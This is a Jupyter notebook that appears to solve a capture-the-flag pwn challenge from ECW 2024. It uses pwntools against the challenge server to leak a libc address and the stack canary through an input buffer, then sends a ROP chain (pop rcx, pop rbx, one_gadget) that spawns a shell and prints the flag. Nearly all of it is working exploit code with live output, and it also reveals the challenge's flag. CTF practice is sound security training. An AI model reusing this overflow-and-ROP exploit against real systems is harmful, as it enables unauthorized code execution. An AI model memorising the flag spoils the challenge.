In [1]:
from pwn import *
from pwn import p64, u64
import time

In [2]:
# TARGET = process("./vuln_patched")
# change the command

TARGET = remote("challenges.challenge-ecw.eu", "39143")

[x] Opening connection to challenges.challenge-ecw.eu on port 39143
[x] Opening connection to challenges.challenge-ecw.eu on port 39143: Trying 141.94.137.179
[+] Opening connection to challenges.challenge-ecw.eu on port 39143: Done


In [3]:
PROMPT = b"plz gief inpt\n"

## Leak address

In [4]:
def leak_addr(offset):
    sz = 240 - offset
    TARGET.recvuntil(PROMPT, timeout=1)
    TARGET.sendline(b"i")

    TARGET.recvuntil(PROMPT, timeout=1)
    TARGET.sendline(b"A" * sz)

    TARGET.recvuntil(PROMPT, timeout=1)
    TARGET.sendline(b"g")

    TARGET.recvuntil(PROMPT, timeout=1)
    TARGET.sendline(b"l")

    TARGET.recvuntil(PROMPT, timeout=1)
    TARGET.sendline(b"o")

    l = TARGET.recvuntil(PROMPT, timeout=1)

    l = l[sz + 1 : -len(PROMPT)]
    return l

In [5]:
libc_ = bytes(leak_addr(121)).ljust(8, b"\x00")
print(hex(u64(libc_)))

0x71a5b6a1a3e3


In [6]:
canary = b"\x00" + bytes(leak_addr(8))
print(hex(u64(canary)))

0x17822176ff334300


## ROP chain

In [7]:
libc = ELF("./libc.so.6")
rop = ROP(libc)

[*] '/home/jack/dev/ctf/ecw24/pwn/Question_of_Defineition/libc.so.6'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        PIE enabled
[*] Loaded 196 cached gadgets for './libc.so.6'


In [8]:
hex(libc.symbols["_IO_file_overflow"])

'0x822e0'

In [9]:
rop.rcx

Gadget(0x102037, ['pop rcx', 'ret'], ['rcx'], 0x8)

In [10]:
rop.rbx

Gadget(0x319ad, ['pop rbx', 'ret'], ['rbx'], 0x8)

In [11]:
def mk_payload(canary, libc_base):
    ONE_GADGET = 0x4C140 + libc_base

    POP_RCX = 0x102037 + libc_base
    POP_RBX = 0x319AD  + libc_base

    return (
        b"A" * 248  # padding until the canary
        + canary
        + b"A" * 0x28  # padding until the return address
        + p64(POP_RCX)
        + p64(0)  # value of rax
        + p64(POP_RBX)
        + p64(0)  # value of rbx
        + p64(ONE_GADGET)
    )

## Attack

In [12]:
libc_base = u64(libc_) - (libc.symbols["_IO_file_overflow"] + 259)
rop = mk_payload(canary, libc_base)

In [13]:
TARGET.sendline(b"i")
TARGET.sendline(rop)

TARGET.sendline(b"f")
TARGET.sendline(b"q")

# Give the ROP chain time to process
time.sleep(2)

TARGET.sendline(b"get_flag")
print(TARGET.recvall(timeout=1).decode())

[x] Receiving all data
[x] Receiving all data: 0B
[x] Receiving all data: 28B
[x] Receiving all data: 78B
[+] Receiving all data: Done (78B)
[*] Closed connection to challenges.challenge-ecw.eu port 39143
plz gief inpt
plz gief inpt
ECW{c-define-considered-harmful-f97f6c791eb8de51}

